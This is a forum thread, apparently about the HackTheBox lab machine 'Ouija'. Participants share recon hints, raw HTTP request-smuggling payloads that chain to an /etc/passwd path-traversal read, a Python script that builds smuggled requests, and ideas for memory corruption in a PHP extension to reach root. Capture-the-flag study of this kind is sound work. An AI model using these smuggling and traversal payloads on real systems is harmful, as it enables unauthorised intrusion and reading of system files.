Posts: 7
Threads: 0
Joined: Nov 2023
Dec 04, 2023, 11:06 PM
(This post was last modified: Dec 04, 2023, 11:09 PM by greenSheep12.)
(Dec 02, 2023, 07:10 PM)rebelHex Wrote: http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git
Did you find it with fuzzing or was it written somewhere?
Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.
also "gitea" has position > 50000
Posts: 2
Threads: 1
Joined: Oct 2023
(Dec 04, 2023, 11:06 PM)greenSheep12 Wrote: (Dec 02, 2023, 07:10 PM)rebelHex Wrote: http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git
Did you find it with fuzzing or was it written somewhere?
Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.
also "gitea" has position > 50000
I have the same question, how did they find the gitea?
Posts: 11
Threads: 0
Joined: Aug 2023
Dec 05, 2023, 12:43 AM
(This post was last modified: Dec 05, 2023, 12:44 AM by Dtom.)
(Dec 04, 2023, 11:43 PM)YourLocalW1zard Wrote: (Dec 04, 2023, 11:06 PM)greenSheep12 Wrote: (Dec 02, 2023, 07:10 PM)rebelHex Wrote: http://gitea.ouija.htb
http://gitea.ouija.htb/leila/ouija-htb/c...d1b5a5c508
git clone http://gitea.ouija.htb/leila/ouija-htb.git
Did you find it with fuzzing or was it written somewhere?
Found "gitea" keyword only in seclists/discovery/DNS/namelist.txt but this wordlist has like 150.000 entries. So I am not sure if all users should fuzz with such a big wordlist.
also "gitea" has position > 50000
I have the same question, how did they find the gitea?
see source
http://ouija.htb/
you will find
src="http://gitea.ouija.htb/leila/ouija-htb/js/tracking.js?_=0183747482"
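The point of the reply above is that the gitea host was never fuzzed: it is referenced by the page's own markup, so pulling hostnames out of the HTML beats a 150,000-entry DNS wordlist. The following is an added example (my code, not a script from this thread or the box) that extracts every hostname under a base domain from an HTML body and formats an /etc/hosts line for them. The SAMPLE_HTML is constructed to resemble the tracking.js reference quoted above; it is not a capture of the real page.

```python
import re
import sys

# Constructed sample markup modelled on the script tag quoted in the thread.
# It is NOT a copy of the real http://ouija.htb/ page.
SAMPLE_HTML = """<html><head>
<script src="http://gitea.ouija.htb/leila/ouija-htb/js/tracking.js?_=0183747482"></script>
<link rel="stylesheet" href="/css/main.css">
</head><body>
<a href="https://ouija.htb/about">About</a>
<a href="http://DEV.ouija.htb/">dev</a>
<p>Not a host: ouija.htbx and mail@ouija.htb</p>
</body></html>"""


def extract_hosts(html: str, base_domain: str) -> list[str]:
    """Return every hostname under base_domain found in html, lowercased and deduplicated.

    The lookbehind/lookahead stop the match from bleeding into neighbouring
    label characters, so 'ouija.htbx' is rejected while 'DEV.ouija.htb/' is kept.
    """
    pat = re.compile(
        r"(?<![A-Za-z0-9.-])((?:[A-Za-z0-9-]+\.)*" + re.escape(base_domain) + r")(?![A-Za-z0-9-])"
    )
    return sorted({m.group(1).lower() for m in pat.finditer(html)})


def hosts_line(ip: str, hosts: list[str]) -> str:
    """Format one /etc/hosts line that maps all discovered names to the box IP."""
    return f"{ip} {' '.join(hosts)}"


if __name__ == "__main__":
    # Usage: python3 find_hosts.py ouija.htb 10.10.11.x < page.html
    # With no stdin redirect the constructed sample is used.
    base = sys.argv[1] if len(sys.argv) > 1 else "ouija.htb"
    ip = sys.argv[2] if len(sys.argv) > 2 else "10.10.11.0"  # placeholder IP
    html = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_HTML
    found = extract_hosts(html, base)
    print(hosts_line(ip, found))
```

Feed it the raw response (curl -s http://ouija.htb/ | python3 find_hosts.py ouija.htb <ip>) rather than a browser "view source", since injected or lazily loaded script references can differ between the two.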
Posts: 4
Threads: 0
Joined: Dec 2023
Dec 05, 2023, 04:18 AM
(This post was last modified: Dec 05, 2023, 04:33 AM by tshakh9. Edit Reason: corrected)
Can anyone provide assistance with http smuggling? I tried this:
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76
GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb
but i got just the default page with no error.
I count the content length from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1
here is the picture of my request https://ibb.co/Hgn1YXG
Posts: 37
Threads: 1
Joined: Jul 2023
(Dec 05, 2023, 04:18 AM)tshakh9 Wrote: Can anyone provide assistance with http smuggling? I tried this:
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76
GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb
but i got just the default page with no error.
I count the content length from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1
here is the picture of my request https://ibb.co/Hgn1YXG
you need to adjust the size `Content-Length`
Posts: 11
Threads: 0
Joined: Oct 2023
The URL is http://dev.ouija.htb/editor.php… you had a mistake here.
The Content-Length is wrong; in this topic there is a Python script that could help you.
(Dec 05, 2023, 04:18 AM)tshakh9 Wrote:
Can anyone provide assistance with http smuggling? I tried this:
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76
GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb
but i got just the default page with no error.
I count the content length from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1
here is the picture of my request https://ibb.co/Hgn1YXG
Posts: 4
Threads: 0
Joined: Dec 2023
(Dec 05, 2023, 04:35 AM)mur Wrote: The url is http://dev.ouija.htb/editor.php…. you had a mistake here.
The content-length is wrong, in this topic you have a python script that could help you
(Dec 05, 2023, 04:18 AM)tshakh9 Wrote:
Can anyone provide assistance with http smuggling? I tried this:
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 76
GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:GET / HTTP/1.1
Host: ouija.htb
but i got just the default page with no error.
I count the content length from here 'GET http://dev.ouija.htb/edidor.php?file=../...etc/passwd HTTP/1.1
x:' and got 75 well +1
here is the picture of my request https://ibb.co/Hgn1YXG
Which script? Or can you tell me how to set Content-Length correctly?
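Content-Length counts the bytes after the blank line that ends the headers, through the final "x:", with a CRLF (two bytes) between every line; a manual count usually slips on exactly those CRLFs. As an added example (my code, not the script referred to above and not from the box), here is a Python helper that builds the POST with the Content-Length computed from the real body bytes, checks the framing, and shows what a back end that ignores that Content-Length would parse next. The file=test.txt query and the 20-byte junk header are constructed placeholders; the thread does not say whether the junk header is required or which desync the box relies on, so the "back end ignores the body" view is an assumption.

```python
import re

CRLF = b"\r\n"


def build_post(host: str, body: bytes, junk_headers=()) -> bytes:
    """Assemble a POST whose Content-Length is the exact byte length of body.

    junk_headers are emitted verbatim before the real Content-Length; the post
    above put a 'Content-Length0aaa...:' line there. Whether it is needed is
    not established in the thread (assumption: harmless to include).
    """
    lines = [b"POST /index.html HTTP/1.1", b"Host: " + host.encode()]
    lines += [h.encode() for h in junk_headers]
    lines.append(b"Content-Length: %d" % len(body))
    return CRLF.join(lines) + CRLF + CRLF + body


def smuggled_prefix(target_host: str, path: str, query: str) -> bytes:
    """The request line the back end should act on, plus a dangling 'x:' header
    name, so the first line of the next request on the socket is swallowed as
    that header's value instead of being parsed as its own request line."""
    return f"GET http://{target_host}{path}?{query} HTTP/1.1".encode() + CRLF + b"x:"


def framing(raw: bytes) -> tuple[int, int]:
    """Return (declared Content-Length, actual body bytes). Unequal means the
    request is mis-framed and a compliant parser will hang or reject it."""
    head, _, body = raw.partition(CRLF + CRLF)
    m = re.search(rb"^Content-Length: (\d+)\r?$", head, re.M)
    if m is None:
        raise ValueError("no Content-Length header in request")
    return int(m.group(1)), len(body)


def backend_view(raw: bytes, follow_up: bytes) -> bytes:
    """Assumption: the front end forwards the POST body, the back end treats the
    POST as bodiless. The body then becomes the start of the next request, with
    follow_up (the next request on the connection) fused onto it."""
    _, _, body = raw.partition(CRLF + CRLF)
    return body + follow_up


if __name__ == "__main__":
    # Constructed demo values; replace the query with whatever you are targeting.
    body = smuggled_prefix("dev.ouija.htb", "/editor.php", "file=test.txt")
    req = build_post("ouija.htb", body, junk_headers=("Content-Length0" + "a" * 20 + ":",))
    print(req.decode())
    print("declared/actual:", framing(req))
    print(backend_view(req, b"GET / HTTP/1.1" + CRLF + b"Host: ouija.htb" + CRLF + CRLF).decode())
```

Paste the output into Burp Repeater with "Update Content-Length" switched off, or send the raw bytes over a socket; letting the tool recompute the header will undo the value you just set.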
Posts: 7
Threads: 0
Joined: Nov 2023
(Dec 05, 2023, 09:49 AM)VfV Wrote: So in order to get root we need to use the
/usr/lib/php/20220829/lverifier.so
Which is part of the bigger picture running on port 9999 that can be found inside
/development/server-management_system_id_0
Analyzing lverifier.so with Ghidra, I think the end result, as function load_users states, would be reading the /etc/shadow file
So we need to make use of memory corruption in the username input field
Quick summary I guess
I see the area of code you are referring to, no idea how to exploit it
Posts: 17
Threads: 1
Joined: Nov 2023
(Dec 05, 2023, 09:49 AM)VfV Wrote: So in order to get root we need to use the
/usr/lib/php/20220829/lverifier.so
Which is part of the bigger picture running on port 9999 that can be found inside
/development/server-management_system_id_0
Analyzing lverifier.so with Ghidra, I think the end result, as function load_users states, would be reading the /etc/shadow file
So we need to make use of memory corruption in the username input field
Quick summary I guess
Not quite.
/etc/shadow is read after the username input check.
And reading /etc/shadow doesn't lead you to root (if the password is strong).
I think there are 2 possible options.
The most probable: 1. Corrupt the path to the log file (default is /var/log/lverifier.log). There is very strange code to take that variable, so you can corrupt this name via the length of the username. And the content to write to this file (default is session=1:user=root:version=beta:type=testing). But this string has the same very strange code to take it from memory, and it can be corrupted too by the length of the username input.
So my idea is to try to corrupt both strings (path and content) into our controllable strings. This way I can only write trash filenames with some trash part of random memory.
Less possible imho: 2. Try to get a buffer overflow and run an OS cmd in the context of php under root. This way I can only achieve a segfault.
Posts: 15
Threads: 0
Joined: Nov 2023
seems a really difficult box, author said "1h30 to root" xd